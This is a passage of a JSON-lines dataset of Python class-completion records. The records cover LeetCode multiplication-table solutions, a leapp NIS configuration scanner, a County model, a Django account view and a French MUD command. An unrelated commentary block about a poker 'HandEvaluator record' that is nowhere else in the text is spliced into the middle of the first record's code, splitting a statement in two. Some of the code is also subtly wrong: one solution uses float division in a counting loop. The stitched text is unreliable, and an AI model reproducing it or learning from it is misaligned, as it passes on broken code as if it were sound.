m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\nstart, end = (1, m * n)\nresult = []\ndicts = {}\nwhile start <= end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n print(mid, c, ans)\n dicts[c] = ans\n result.append(c)\n if c > k:\n end = mid - 1\n elif c < k:\n start = mid + 1\n else:\n return ans\na = sorted(result)\npos = bisect.bisect_right(a, k)\nprint(dicts)\nreturn dicts[a[pos]]", "def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\nstart, end = (1, m * n)\nwhile start < end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n if c < k:\n start = mid + 1\n else:\n end = mid\nreturn start", "def countLessThan(x, m, n):\n assert m <= n\n count = 0\n for i in range(1, m + 1):\n if x // i < n:\n count += x / i\n else:\n count += n\n return count\nif m > n:\n m, n = (n, m)\nlo, hi = (1, m * n)\nwhile lo < hi:\n mid = (lo + hi) // 2\n if countLessThan(mid, m, n) < k:\n lo = mid + 1\n else:\n hi = mid\nreturn lo"], "bodies_text": "<|body_start_0|>\n import bisect\n\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n result = []\n dicts = {}\n while start <= end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n print(mid, c, ans)\n dicts[c] = ans\n result.append(c)\n if c > k:\n end = mid - 1\n elif c < k:\n start = mid + 1\n else:\n return ans\n a = sorted(result)\n pos = bisect.bisect_right(a, k)\n print(dicts)\n return dicts[a[pos]]\n<|end_body_0|>\n\n<|body_start_1|>\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n while start < end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n if c < k:\n start = mid + 1\n else:\n end = mid\n return start\n<|end_body_1|>\n\n<|body_start_2|>\n def countLessThan(x, m, n):\n assert m <= n\n count = 0\n for i in range(1, m + 1):\n if x // i < n:\n count += x / i\n else:\n count += n\n return count\n if m > n:\n m, n = 
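Two defects are worth flagging in the HandEvaluator record that ends here. First, `str_to_card` opens with `if isinstance(card_string, Card): return card`, but no name `card` is in scope, so passing a Card raises NameError; `return card_string` is evidently what was meant. Second, the rank parser only handles t/j/q/k/a, so every numeric rank falls through to the default of 2 ('9h' parses as a two). The record is also Python 2 throughout (`basestring`, `xrange`, and `board = map(...)` followed by `board.append(255)`, which breaks on Python 3's map iterator). A corrected Python 3 sketch of just the parsing step, with a namedtuple standing in for the pokerbots.engine.game.Card the record assumes:

    # Corrected Python 3 sketch of HandEvaluator.str_to_card. The archived
    # version returns the undefined name `card` on the isinstance early-out
    # and never parses digit ranks.
    from collections import namedtuple

    Card = namedtuple('Card', ['rank', 'suit'])

    RANKS = {'t': 10, 'j': 11, 'q': 12, 'k': 13, 'a': 14}
    SUITS = {'s': 1, 'h': 2, 'd': 3, 'c': 4}

    def str_to_card(card_string):
        if isinstance(card_string, Card):
            return card_string        # fixed: was `return card` (NameError)
        rank_ch, suit_ch = card_string[0].lower(), card_string[1].lower()
        rank = RANKS.get(rank_ch, int(rank_ch) if rank_ch.isdigit() else 2)
        return Card(rank, SUITS.get(suit_ch, 1))

    assert str_to_card('As') == Card(14, 1)
    assert str_to_card('9h') == Card(9, 2)   # digit ranks now parse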
(n, m)\n lo, hi = (1, m * n)\n while lo < hi:\n mid = (lo + hi) // 2\n if countLessThan(mid, m, n) < k:\n lo = mid + 1\n else:\n hi = mid\n return lo\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def findKthNumber(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int\"\"\"\n <|body_0|>\n\n def findKthNumber_1(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 1858ms\"\"\"\n <|body_1|>\n\n def findKthNumber_2(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 477ms\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n import bisect\n\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n result = []\n dicts = {}\n while start <= end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n print(mid, c, ans)\n dicts[c] = ans\n result.append(c)\n if c > k:\n end = mid - 1\n elif c < k:\n start = mid + 1\n else:\n return ans\n a = sorted(result)\n pos = bisect.bisect_right(a, k)\n print(dicts)\n return dicts[a[pos]]\n<|end_body_0|>\n\n<|body_start_1|>\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n while start < end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n if c < k:\n start = mid + 1\n else:\n end = mid\n return start\n<|end_body_1|>\n\n<|body_start_2|>\n def countLessThan(x, m, n):\n assert m <= n\n count = 0\n for i in range(1, m + 1):\n if x // i < n:\n count += x / i\n else:\n count += n\n return count\n if m > n:\n m, n = (n, m)\n lo, hi = (1, m * n)\n while lo < hi:\n mid = (lo + hi) // 2\n if countLessThan(mid, m, n) < k:\n lo = mid + 1\n else:\n hi = mid\n return lo\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000261", "length_bytes": 3475, "license_type": "no_license", "methods": [{"docstring": ":type m: int :type n: int :type k: int :rtype: int", "name": "findKthNumber", "signature": "def findKthNumber(self, m, n, k)"}, {"docstring": ":type m: int :type n: int :type k: int :rtype: int 1858ms", "name": "findKthNumber_1", "signature": "def findKthNumber_1(self, m, n, k)"}, {"docstring": ":type m: int :type n: int :type k: int :rtype: int 477ms", "name": "findKthNumber_2", "signature": "def findKthNumber_2(self, m, n, k)"}], "n_methods": 3, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findKthNumber(self, m, n, k): :type m: int :type n: int :type k: int :rtype: int\n- def findKthNumber_1(self, m, n, k): :type m: int :type n: int :type k: int :rtype: int 1858ms\n- def findKthNumber_2(self, m, n, k): :type m: int :type n: int :type k: int :rtype: int 477ms", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findKthNumber(self, m, n, k): :type m: int :type n: int :type k: int :rtype: int\n- def findKthNumber_1(self, m, n, k): :type m: int :type n: int :type k: int :rtype: int 1858ms\n- def findKthNumber_2(self, m, n, k): :type m: int :type n: int :type k: int :rtype: int 477ms\n\n<|skeleton|>\nclass Solution:\n\n def findKthNumber(self, 
m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int\"\"\"\n <|body_0|>\n\n def findKthNumber_1(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 1858ms\"\"\"\n <|body_1|>\n\n def findKthNumber_2(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 477ms\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n import bisect\n\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n result = []\n dicts = {}\n while start <= end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n print(mid, c, ans)\n dicts[c] = ans\n result.append(c)\n if c > k:\n end = mid - 1\n elif c < k:\n start = mid + 1\n else:\n return ans\n a = sorted(result)\n pos = bisect.bisect_right(a, k)\n print(dicts)\n return dicts[a[pos]]\n<|end_body_0|>\n\n<|body_start_1|>\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n while start < end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n if c < k:\n start = mid + 1\n else:\n end = mid\n return start\n<|end_body_1|>\n\n<|body_start_2|>\n def countLessThan(x, m, n):\n assert m <= n\n count = 0\n for i in range(1, m + 1):\n if x // i < n:\n count += x / i\n else:\n count += n\n return count\n if m > n:\n m, n = (n, m)\n lo, hi = (1, m * n)\n while lo < hi:\n mid = (lo + hi) // 2\n if countLessThan(mid, m, n) < k:\n lo = mid + 1\n else:\n hi = mid\n return lo\n<|end_body_2|>\n", "revision_id": "679a2b246b8b6bb7fc55ed1c8096d3047d6d4461", "skeleton": "<|skeleton|>\nclass Solution:\n\n def findKthNumber(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int\"\"\"\n <|body_0|>\n\n def findKthNumber_1(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 1858ms\"\"\"\n <|body_1|>\n\n def findKthNumber_2(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 477ms\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def findKthNumber(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int\"\"\"\n import bisect\n\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n result = []\n dicts = {}\n while start <= end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n print(mid, c, ans)\n dicts[c] = ans\n result.append(c)\n if c > k:\n end = mid - 1\n elif c < k:\n start = mid + 1\n else:\n return ans\n a = sorted(result)\n pos = bisect.bisect_right(a, k)\n print(dicts)\n return dicts[a[pos]]\n\n def findKthNumber_1(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 1858ms\"\"\"\n def Count(num, m, n):\n count = 0\n ans = 0\n for i in range(1, m + 1):\n a = min(num // i, n)\n count += a\n ans = max(ans, a * i)\n return (count, ans)\n start, end = (1, m * n)\n while start < end:\n mid = (start + end) // 2\n c, ans = Count(mid, m, n)\n if c < k:\n start = mid + 1\n else:\n end = mid\n return start\n\n def findKthNumber_2(self, m, n, k):\n \"\"\":type m: int :type n: int :type k: int :rtype: int 477ms\"\"\"\n def countLessThan(x, m, n):\n assert m <= n\n count = 0\n for i in range(1, m + 1):\n if x 
// i < n:\n count += x / i\n else:\n count += n\n return count\n if m > n:\n m, n = (n, m)\n lo, hi = (1, m * n)\n while lo < hi:\n mid = (lo + hi) // 2\n if countLessThan(mid, m, n) < k:\n lo = mid + 1\n else:\n hi = mid\n return lo\n", "source": "the_stack_v2_python_sparse", "source_path": "KthSmallestNumberInMultiplicationTable_HARD_668.py", "source_repo": "953250587/leetcode-python", "split": "test", "star_events_count": 2} {"blob_id": "fd3c807ef0ff222581fdbf60df0262fdd147b303", "bodies": ["if not os.path.isfile(YPBIND_CONF_FILE):\n return False\nwith open(YPBIND_CONF_FILE) as f:\n lines = [line.strip() for line in f.readlines() if line.strip()]\nfor line in lines:\n if not line.startswith('#'):\n return True\nreturn False", "if not os.path.isdir(YPSERV_DIR_PATH):\n return False\nreturn any((f not in YPSERV_DEFAULT_FILES for f in os.listdir(YPSERV_DIR_PATH)))", "pkgs = []\nif self.server_has_non_default_configuration():\n pkgs.append('ypserv')\nif self.client_has_non_default_configuration():\n pkgs.append('ypbind')\napi.produce(NISConfig(nis_not_default_conf=pkgs))"], "bodies_text": "<|body_start_0|>\n if not os.path.isfile(YPBIND_CONF_FILE):\n return False\n with open(YPBIND_CONF_FILE) as f:\n lines = [line.strip() for line in f.readlines() if line.strip()]\n for line in lines:\n if not line.startswith('#'):\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if not os.path.isdir(YPSERV_DIR_PATH):\n return False\n return any((f not in YPSERV_DEFAULT_FILES for f in os.listdir(YPSERV_DIR_PATH)))\n<|end_body_1|>\n\n<|body_start_2|>\n pkgs = []\n if self.server_has_non_default_configuration():\n pkgs.append('ypserv')\n if self.client_has_non_default_configuration():\n pkgs.append('ypbind')\n api.produce(NISConfig(nis_not_default_conf=pkgs))\n<|end_body_2|>\n", "class_docstring": "Helper library for NISScan actor.", "class_name": "NISScanLibrary", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NISScanLibrary:\n \"\"\"Helper library for NISScan actor.\"\"\"\n\n def client_has_non_default_configuration(self):\n \"\"\"Check for any significant ypbind configuration lines in .conf file.\"\"\"\n <|body_0|>\n\n def server_has_non_default_configuration(self):\n \"\"\"Check for any additional (not default) files in ypserv DIR.\"\"\"\n <|body_1|>\n\n def process(self):\n \"\"\"Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not os.path.isfile(YPBIND_CONF_FILE):\n return False\n with open(YPBIND_CONF_FILE) as f:\n lines = [line.strip() for line in f.readlines() if line.strip()]\n for line in lines:\n if not line.startswith('#'):\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if not os.path.isdir(YPSERV_DIR_PATH):\n return False\n return any((f not in YPSERV_DEFAULT_FILES for f in os.listdir(YPSERV_DIR_PATH)))\n<|end_body_1|>\n\n<|body_start_2|>\n pkgs = []\n if self.server_has_non_default_configuration():\n pkgs.append('ypserv')\n if self.client_has_non_default_configuration():\n pkgs.append('ypbind')\n api.produce(NISConfig(nis_not_default_conf=pkgs))\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000262", "length_bytes": 1641, "license_type": "permissive", "methods": [{"docstring": "Check for any significant ypbind configuration lines in .conf file.", "name": "client_has_non_default_configuration", "signature": "def 
client_has_non_default_configuration(self)"}, {"docstring": "Check for any additional (not default) files in ypserv DIR.", "name": "server_has_non_default_configuration", "signature": "def server_has_non_default_configuration(self)"}, {"docstring": "Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry", "name": "process", "signature": "def process(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_003906", "prompt": "Implement the Python class `NISScanLibrary` described below.\n\nClass description:\nHelper library for NISScan actor.\n\nMethod signatures and docstrings:\n- def client_has_non_default_configuration(self): Check for any significant ypbind configuration lines in .conf file.\n- def server_has_non_default_configuration(self): Check for any additional (not default) files in ypserv DIR.\n- def process(self): Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry", "prompted_full_text": "Implement the Python class `NISScanLibrary` described below.\n\nClass description:\nHelper library for NISScan actor.\n\nMethod signatures and docstrings:\n- def client_has_non_default_configuration(self): Check for any significant ypbind configuration lines in .conf file.\n- def server_has_non_default_configuration(self): Check for any additional (not default) files in ypserv DIR.\n- def process(self): Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry\n\n<|skeleton|>\nclass NISScanLibrary:\n \"\"\"Helper library for NISScan actor.\"\"\"\n\n def client_has_non_default_configuration(self):\n \"\"\"Check for any significant ypbind configuration lines in .conf file.\"\"\"\n <|body_0|>\n\n def server_has_non_default_configuration(self):\n \"\"\"Check for any additional (not default) files in ypserv DIR.\"\"\"\n <|body_1|>\n\n def process(self):\n \"\"\"Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not os.path.isfile(YPBIND_CONF_FILE):\n return False\n with open(YPBIND_CONF_FILE) as f:\n lines = [line.strip() for line in f.readlines() if line.strip()]\n for line in lines:\n if not line.startswith('#'):\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if not os.path.isdir(YPSERV_DIR_PATH):\n return False\n return any((f not in YPSERV_DEFAULT_FILES for f in os.listdir(YPSERV_DIR_PATH)))\n<|end_body_1|>\n\n<|body_start_2|>\n pkgs = []\n if self.server_has_non_default_configuration():\n pkgs.append('ypserv')\n if self.client_has_non_default_configuration():\n pkgs.append('ypbind')\n api.produce(NISConfig(nis_not_default_conf=pkgs))\n<|end_body_2|>\n", "revision_id": "93c6fd4f150229a01ba43ce74214043cffaf7dce", "skeleton": "<|skeleton|>\nclass NISScanLibrary:\n \"\"\"Helper library for NISScan actor.\"\"\"\n\n def client_has_non_default_configuration(self):\n \"\"\"Check for any significant ypbind configuration lines in .conf file.\"\"\"\n <|body_0|>\n\n def server_has_non_default_configuration(self):\n \"\"\"Check for any additional (not default) files in ypserv DIR.\"\"\"\n <|body_1|>\n\n def process(self):\n \"\"\"Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": 
"data/stack_v2_sparse_classes_30k", "solution": "class NISScanLibrary:\n \"\"\"Helper library for NISScan actor.\"\"\"\n\n def client_has_non_default_configuration(self):\n \"\"\"Check for any significant ypbind configuration lines in .conf file.\"\"\"\n if not os.path.isfile(YPBIND_CONF_FILE):\n return False\n with open(YPBIND_CONF_FILE) as f:\n lines = [line.strip() for line in f.readlines() if line.strip()]\n for line in lines:\n if not line.startswith('#'):\n return True\n return False\n\n def server_has_non_default_configuration(self):\n \"\"\"Check for any additional (not default) files in ypserv DIR.\"\"\"\n if not os.path.isdir(YPSERV_DIR_PATH):\n return False\n return any((f not in YPSERV_DEFAULT_FILES for f in os.listdir(YPSERV_DIR_PATH)))\n\n def process(self):\n \"\"\"Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry\"\"\"\n pkgs = []\n if self.server_has_non_default_configuration():\n pkgs.append('ypserv')\n if self.client_has_non_default_configuration():\n pkgs.append('ypbind')\n api.produce(NISConfig(nis_not_default_conf=pkgs))\n", "source": "the_stack_v2_python_sparse", "source_path": "repos/system_upgrade/el8toel9/actors/nisscanner/libraries/nisscan.py", "source_repo": "oamg/leapp-repository", "split": "test", "star_events_count": 40} {"blob_id": "0a49a12b7aeef8bb51ffca1c6ad60c8a35ed2151", "bodies": ["self.id: uuid.UUID = uuid.uuid4()\nself.state: 'State' = state\nself.name: str = name\nself._cities: Set['City'] = set()", "self._cities.add(city)\nif reflexive:\n city.associate(self, reflexive=False)"], "bodies_text": "<|body_start_0|>\n self.id: uuid.UUID = uuid.uuid4()\n self.state: 'State' = state\n self.name: str = name\n self._cities: Set['City'] = set()\n<|end_body_0|>\n\n<|body_start_1|>\n self._cities.add(city)\n if reflexive:\n city.associate(self, reflexive=False)\n<|end_body_1|>\n", "class_docstring": "A country.", "class_name": "County", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass County:\n \"\"\"A country.\"\"\"\n\n def __init__(self, name: str, state: 'State'):\n \"\"\":param name: the name of the state :param state: the state in which the county resides\"\"\"\n <|body_0|>\n\n def associate(self, city: 'City', reflexive: bool=True):\n \"\"\"Associate this county with a city. :param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.id: uuid.UUID = uuid.uuid4()\n self.state: 'State' = state\n self.name: str = name\n self._cities: Set['City'] = set()\n<|end_body_0|>\n\n<|body_start_1|>\n self._cities.add(city)\n if reflexive:\n city.associate(self, reflexive=False)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000263", "length_bytes": 8831, "license_type": "permissive", "methods": [{"docstring": ":param name: the name of the state :param state: the state in which the county resides", "name": "__init__", "signature": "def __init__(self, name: str, state: 'State')"}, {"docstring": "Associate this county with a city. 
:param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city", "name": "associate", "signature": "def associate(self, city: 'City', reflexive: bool=True)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000782", "prompt": "Implement the Python class `County` described below.\n\nClass description:\nA country.\n\nMethod signatures and docstrings:\n- def __init__(self, name: str, state: 'State'): :param name: the name of the state :param state: the state in which the county resides\n- def associate(self, city: 'City', reflexive: bool=True): Associate this county with a city. :param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city", "prompted_full_text": "Implement the Python class `County` described below.\n\nClass description:\nA country.\n\nMethod signatures and docstrings:\n- def __init__(self, name: str, state: 'State'): :param name: the name of the state :param state: the state in which the county resides\n- def associate(self, city: 'City', reflexive: bool=True): Associate this county with a city. :param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city\n\n<|skeleton|>\nclass County:\n \"\"\"A country.\"\"\"\n\n def __init__(self, name: str, state: 'State'):\n \"\"\":param name: the name of the state :param state: the state in which the county resides\"\"\"\n <|body_0|>\n\n def associate(self, city: 'City', reflexive: bool=True):\n \"\"\"Associate this county with a city. :param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.id: uuid.UUID = uuid.uuid4()\n self.state: 'State' = state\n self.name: str = name\n self._cities: Set['City'] = set()\n<|end_body_0|>\n\n<|body_start_1|>\n self._cities.add(city)\n if reflexive:\n city.associate(self, reflexive=False)\n<|end_body_1|>\n", "revision_id": "f0750799eade79405e3f52e1a2a61dfd4e88dd4f", "skeleton": "<|skeleton|>\nclass County:\n \"\"\"A country.\"\"\"\n\n def __init__(self, name: str, state: 'State'):\n \"\"\":param name: the name of the state :param state: the state in which the county resides\"\"\"\n <|body_0|>\n\n def associate(self, city: 'City', reflexive: bool=True):\n \"\"\"Associate this county with a city. :param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class County:\n \"\"\"A country.\"\"\"\n\n def __init__(self, name: str, state: 'State'):\n \"\"\":param name: the name of the state :param state: the state in which the county resides\"\"\"\n self.id: uuid.UUID = uuid.uuid4()\n self.state: 'State' = state\n self.name: str = name\n self._cities: Set['City'] = set()\n\n def associate(self, city: 'City', reflexive: bool=True):\n \"\"\"Associate this county with a city. 
:param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city\"\"\"\n self._cities.add(city)\n if reflexive:\n city.associate(self, reflexive=False)\n", "source": "the_stack_v2_python_sparse", "source_path": "Python_lib/cliff/model.py", "source_repo": "mndarren/Code-Lib", "split": "test", "star_events_count": 8} {"blob_id": "05d0a6fd9c981c37a461a33e67c09f1bd713475d", "bodies": ["user = self.request.user\nqueryset = self.queryset.filter(pk=user.pk)\nreturn queryset", "try:\n account = self.get_queryset().get()\nexcept Exception:\n return Response(status=status.HTTP_404_NOT_FOUND)\nserializer = self.get_serializer(account)\nreturn Response(serializer.data)"], "bodies_text": "<|body_start_0|>\n user = self.request.user\n queryset = self.queryset.filter(pk=user.pk)\n return queryset\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n account = self.get_queryset().get()\n except Exception:\n return Response(status=status.HTTP_404_NOT_FOUND)\n serializer = self.get_serializer(account)\n return Response(serializer.data)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "AccountView", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AccountView:\n\n def get_queryset(self):\n \"\"\"Filter account by user pk :return: queryset\"\"\"\n <|body_0|>\n\n def list(self, request, *args, **kwargs):\n \"\"\"Redeclared list method to return one instance :param request: :param args: :param kwargs: :return: Response()\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = self.request.user\n queryset = self.queryset.filter(pk=user.pk)\n return queryset\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n account = self.get_queryset().get()\n except Exception:\n return Response(status=status.HTTP_404_NOT_FOUND)\n serializer = self.get_serializer(account)\n return Response(serializer.data)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000264", "length_bytes": 4771, "license_type": "no_license", "methods": [{"docstring": "Filter account by user pk :return: queryset", "name": "get_queryset", "signature": "def get_queryset(self)"}, {"docstring": "Redeclared list method to return one instance :param request: :param args: :param kwargs: :return: Response()", "name": "list", "signature": "def list(self, request, *args, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001996", "prompt": "Implement the Python class `AccountView` described below.\n\nClass description:\nImplement the AccountView class.\n\nMethod signatures and docstrings:\n- def get_queryset(self): Filter account by user pk :return: queryset\n- def list(self, request, *args, **kwargs): Redeclared list method to return one instance :param request: :param args: :param kwargs: :return: Response()", "prompted_full_text": "Implement the Python class `AccountView` described below.\n\nClass description:\nImplement the AccountView class.\n\nMethod signatures and docstrings:\n- def get_queryset(self): Filter account by user pk :return: queryset\n- def list(self, request, *args, **kwargs): Redeclared list method to return one instance :param request: :param args: :param kwargs: :return: Response()\n\n<|skeleton|>\nclass AccountView:\n\n def get_queryset(self):\n \"\"\"Filter account by user pk :return: queryset\"\"\"\n <|body_0|>\n\n def list(self, request, *args, **kwargs):\n \"\"\"Redeclared list method to return one instance :param request: 
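The County record that ends here shows the usual guard for bidirectional links: each side registers the other, and the back-reference call passes `reflexive=False` so the two objects do not recurse into each other forever. (Two small typos travel through every duplicated field of this record and are left intact above: the class docstring reads "A country." for a class named County, and "the city which which" should read "with which".) A stripped-down sketch of the pattern with a matching City side, which the record assumes but does not include:

    # Sketch of the reflexive-association guard: reflexive=False stops the
    # recursion after exactly one back-reference.
    class County:
        def __init__(self, name):
            self.name = name
            self._cities = set()

        def associate(self, city, reflexive=True):
            self._cities.add(city)
            if reflexive:
                city.associate(self, reflexive=False)

    class City:
        def __init__(self, name):
            self.name = name
            self._counties = set()

        def associate(self, county, reflexive=True):
            self._counties.add(county)
            if reflexive:
                county.associate(self, reflexive=False)

    kings = County('Kings')
    brooklyn = City('Brooklyn')
    kings.associate(brooklyn)
    assert kings in brooklyn._counties and brooklyn in kings._cities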
:param args: :param kwargs: :return: Response()\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = self.request.user\n queryset = self.queryset.filter(pk=user.pk)\n return queryset\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n account = self.get_queryset().get()\n except Exception:\n return Response(status=status.HTTP_404_NOT_FOUND)\n serializer = self.get_serializer(account)\n return Response(serializer.data)\n<|end_body_1|>\n", "revision_id": "0e3e755d49b284eb3e7ec2c2f8542d013d313abd", "skeleton": "<|skeleton|>\nclass AccountView:\n\n def get_queryset(self):\n \"\"\"Filter account by user pk :return: queryset\"\"\"\n <|body_0|>\n\n def list(self, request, *args, **kwargs):\n \"\"\"Redeclared list method to return one instance :param request: :param args: :param kwargs: :return: Response()\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AccountView:\n def get_queryset(self):\n \"\"\"Filter account by user pk :return: queryset\"\"\"\n user = self.request.user\n queryset = self.queryset.filter(pk=user.pk)\n return queryset\n\n def list(self, request, *args, **kwargs):\n \"\"\"Redeclared list method to return one instance :param request: :param args: :param kwargs: :return: Response()\"\"\"\n try:\n account = self.get_queryset().get()\n except Exception:\n return Response(status=status.HTTP_404_NOT_FOUND)\n serializer = self.get_serializer(account)\n return Response(serializer.data)\n", "source": "the_stack_v2_python_sparse", "source_path": "grc_account/views.py", "source_repo": "kolexander/common", "split": "test", "star_events_count": 0} {"blob_id": "797dfcfff6749fb51880e5888829a1c957e406fe", "bodies": ["Parametre.__init__(self, 'creer', 'create')\nself.schema = '()'\nself.aide_courte = 'crée une perturbation'\nself.aide_longue = \"Cette commande permet de créer une perturbation météorologique dans la salle où vous vous trouvez (par exemple, faire apparaître un nuage). La salle où vous vous trouvez est prise comme point de départ. Notez que vous ne pourrez pas faire apparaître une perturbation si une autre est présente ou trop proche. Les perturbations ont en effet des rayons d'action, et deux perturbations ne doivent pas entrer en conflit (un nuage ne doit pas en recouvrir un second, par exemple). 
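In the AccountView record just closed, `list` collapses the queryset to one row with `.get()` but catches bare `Exception`, so every failure, including programming errors, is reported as a 404. The only lookup outcomes Django's `.get()` actually signals are DoesNotExist and MultipleObjectsReturned; catching just those lets real bugs surface. A plain-Python sketch of the narrower handling (stand-in exception classes, since the record's Django/DRF imports are not shown):

    # Sketch of narrowing AccountView.list's catch-all: only the two
    # lookup failures map to 404; anything else propagates.
    class DoesNotExist(Exception): pass
    class MultipleObjectsReturned(Exception): pass

    def get_single(rows):
        if not rows:
            raise DoesNotExist
        if len(rows) > 1:
            raise MultipleObjectsReturned
        return rows[0]

    def list_account(rows):
        try:
            account = get_single(rows)
        except (DoesNotExist, MultipleObjectsReturned):
            return (404, None)       # only lookup failures become 404
        return (200, account)        # everything else propagates

    assert list_account([]) == (404, None)
    assert list_account(['acct'])[0] == 200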
